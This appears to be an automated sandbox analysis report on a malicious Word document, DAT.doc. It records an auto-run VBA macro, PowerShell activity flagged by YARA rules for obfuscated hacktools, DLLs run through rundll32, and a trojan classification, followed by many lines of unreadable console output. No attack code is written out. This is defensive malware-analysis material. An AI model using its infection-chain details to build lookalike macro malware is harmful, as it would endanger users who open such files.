Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BA2EA	12_2_004BA2EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B9AE2	12_2_004B9AE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AB0E1	12_2_004AB0E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A7AE4	12_2_004A7AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BD08F	12_2_004BD08F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AF099	12_2_004AF099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BA094	12_2_004BA094
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B72AE	12_2_004B72AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B0EA0	12_2_004B0EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AC8A5	12_2_004AC8A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A6ABA	12_2_004A6ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A12B6	12_2_004A12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A6342	12_2_004A6342
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A2746	12_2_004A2746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B3745	12_2_004B3745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004ADB5B	12_2_004ADB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BC95E	12_2_004BC95E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A4D5F	12_2_004A4D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A8F55	12_2_004A8F55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B5B60	12_2_004B5B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B8978	12_2_004B8978
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A5D0E	12_2_004A5D0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B0705	12_2_004B0705
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B8313	12_2_004B8313
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B2513	12_2_004B2513
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004ABB28	12_2_004ABB28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A792C	12_2_004A792C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AE924	12_2_004AE924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B5D36	12_2_004B5D36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AC3C2	12_2_004AC3C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B39E1	12_2_004B39E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AB7F8	12_2_004AB7F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A33F4	12_2_004A33F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AEF80	12_2_004AEF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BB19F	12_2_004BB19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A3B97	12_2_004A3B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A8994	12_2_004A8994
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A3FAB	12_2_004A3FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A67AC	12_2_004A67AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AB3A2	12_2_004AB3A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A81A0	12_2_004A81A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004A59B8	12_2_004A59B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004BCBB0	12_2_004BCBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004AFFB5	12_2_004AFFB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B6005	13_2_001B6005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B3C28	13_2_001B3C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BC44B	13_2_001BC44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B7C4A	13_2_001B7C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C1079	13_2_001C1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BE871	13_2_001BE871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C0065	13_2_001C0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C4460	13_2_001C4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BE499	13_2_001BE499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C9494	13_2_001C9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CC48F	13_2_001CC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BBCA5	13_2_001BBCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C5CCB	13_2_001C5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BA4E1	13_2_001BA4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C1913	13_2_001C1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B510E	13_2_001B510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C5136	13_2_001C5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B6D2C	13_2_001B6D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B3521	13_2_001B3521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BDD24	13_2_001BDD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CBD5E	13_2_001CBD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B415F	13_2_001B415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C7D78	13_2_001C7D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CA59F	13_2_001CA59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CB59B	13_2_001CB59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B7D94	13_2_001B7D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B4DB8	13_2_001B4DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C41AD	13_2_001C41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B75A0	13_2_001B75A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C2DE1	13_2_001C2DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B2A18	13_2_001B2A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B0A00	13_2_001B0A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C2A00	13_2_001C2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D1600	13_2_001D1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C6E50	13_2_001C6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B367A	13_2_001B367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C1E7D	13_2_001C1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C8279	13_2_001C8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BCA68	13_2_001BCA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B6A6F	13_2_001B6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B628A	13_2_001B628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B5EBA	13_2_001B5EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001D12B6	13_2_001D12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B06B6	13_2_001B06B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C66AE	13_2_001C66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C02A0	13_2_001C02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C6AD5	13_2_001C6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C06D1	13_2_001C06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BD2C9	13_2_001BD2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BC6CE	13_2_001BC6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C96EA	13_2_001C96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C8EE2	13_2_001C8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B6EE4	13_2_001B6EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B8B16	13_2_001B8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C7713	13_2_001C7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BFB05	13_2_001BFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BEF04	13_2_001BEF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C473C	13_2_001C473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BAF28	13_2_001BAF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BCF5B	13_2_001BCF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B8355	13_2_001B8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C4B48	13_2_001C4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B5742	13_2_001B5742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C2B45	13_2_001C2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B1B46	13_2_001B1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BD760	13_2_001BD760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C4F60	13_2_001C4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B2F97	13_2_001B2F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BE380	13_2_001BE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CBFB0	13_2_001CBFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BF3B5	13_2_001BF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B33AB	13_2_001B33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B5BAC	13_2_001B5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BA7A2	13_2_001BA7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BB7C2	13_2_001BB7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001BABF8	13_2_001BABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B77F0	13_2_001B77F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B27F4	13_2_001B27F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C9BE4	13_2_001C9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C6C05	14_2_001C6C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C6E8A	14_2_001C6E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C9716	14_2_001C9716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001CFB04	14_2_001CFB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D533C	14_2_001D533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C4121	14_2_001C4121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D5748	14_2_001D5748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001CE360	14_2_001CE360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001DC19B	14_2_001DC19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D4DAD	14_2_001D4DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C83F0	14_2_001C83F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001DA7E4	14_2_001DA7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C3618	14_2_001C3618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001C1600	14_2_001C1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D3600	14_2_001D3600

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: DAT.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module T6dwlv_ivpoiq2, Function Document_open			Name: Document_open

Document contains embedded VBA macros

Source: DAT.doc

OLE indicator, VBA macros: true

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: String function: 1000E380 appears 41 times

Yara signature match

Source: 00000005.00000002.2138019176.00000000003B6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2138066373.0000000001CF4000.00000004.00000040.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: Lyeta6ud.dll.5.dr

Static PE information: Section: .rsrc ZLIB complexity 0.995406845869

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@36/9@2/5

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_00206686 CreateToolhelp32Snapshot,

20_2_00206686

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$DAT.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDDA1.tmp

Jump to behavior

Source: DAT.doc

OLE indicator, Word Document stream: true

Source: DAT.doc	OLE document summary: title field not present or empty
Source: DAT.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............,........................... ...............................h...............#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............,...0...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K......x._.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.F......................p.j......................X.............}..v.....`......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................p.j..... X...............X.............}..v....8a......0...............x._.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................qq.j......................X.............}..v.....m......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................qq.j....X._...............X.............}..v.....n......0................._.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............!q.j......................X.............}..v....8.......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............!q.j..... X...............X.............}..v............0...............(._.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............Q..j....@J_...............X.............}..v....H.......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............Q..j....@J_...............X.............}..v....H.......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............Q..j....@J_...............X.............}..v....H.......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0................F_.....(.......0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[..................j....P.................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.3.5.............}..v............0................F_.....$.......0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j..... ................X.............}..v.....!......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............Q..j....@J_...............X.............}..v.....'......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j.....(................X.............}..v.....)......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............Q..j....@J_...............X.............}..v...../......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j.....0................X.............}..v.....1......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............Q..j....@J_...............X.............}..v.....7......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j.....8................X.............}..v.....9......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............Q..j......................X.............}..v.....?......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j.....@................X.............}..v.....A......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............Q..j....@J_...............X.............}..v.....G......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j.....H................X.............}..v.....I......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............Q..j....@J_...............X.............}..v.....O......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j.....P................X.............}..v.....Q......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............Q..j....@J_...............X.............}..v.....W......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j.....X................X.............}..v.....Y......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v....._......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....`................X.............}..v.....a......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E.F.....................Q..j....@J_...............X.............}..v.....g......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....h................X.............}..v.....i......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v.....o......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....p................X.............}..v.....q......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v.....w......0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....x................X.............}..v.....y......0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j......................X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................Q..j....@J_...............X.............}..v............0...............................0...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................X.............}..v............0................G_.............0...............	Jump to behavior
